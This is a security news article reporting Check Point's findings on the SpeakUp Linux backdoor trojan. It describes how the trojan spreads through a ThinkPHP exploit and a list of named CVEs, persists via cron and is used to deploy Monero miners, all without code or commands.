SpeakUp backdoor trojan can run on six different Linux distributions, and even on macOS
Hackers have developed a new backdoor trojan that is capable of running on Linux systems. Named SpeakUp, this malware is currently distributed to Linux servers mainly located in China.
The hackers behind this recent wave of attacks are using an exploit for the ThinkPHP framework to infect servers with this new malware strain.
Once the trojan gains a foothold on vulnerable systems, hackers can use it to modify the local cron utility to gain boot persistence, run shell commands, execute files downloaded from a remote command and control (C&C) server, and update or uninstall itself.
Check Point researchers, the ones who spotted this new backdoor for the first time three weeks ago, on January 14, say SpeakUp also comes with a built-in Python script that the malware uses to spread laterally through the local network.
This script can scan local networks for open ports, brute-force nearby systems using a list of pre-defined usernames and passwords, and use one of seven exploits to take over unpatched systems. This list of second-stage exploits includes the likes of:
CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities
CVE-2010-1871: JBoss Seam Framework remote code execution
JBoss AS 3/4/5/6: Remote Command Execution
CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE
CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware.
Hadoop YARN ResourceManager - Command Execution
CVE-2016-3088: Apache ActiveMQ Fileserver File Upload Remote Code Execution Vulnerability.
Once it infects new machines, SpeakUp deploys itself to these new systems. Check Point says SpeakUp can run on six different Linux distributions and even macOS systems.
The group behind this recent scan-and-infect campaign has been busy using SpeakUp to deploy Monero cryptocurrency miners on infected servers. The Check Point team says the group has made roughly 107 Monero coins since the start of their campaign, which is around $4,500.
While the SpeakUp authors are currently exploiting a vulnerability (CVE-2018-20062) in a Chinese-only PHP framework, they can easily switch to any other exploits to spread their backdoor to even a wider array of targets, albeit they haven’t been seen targeting anything except ThinkPHP.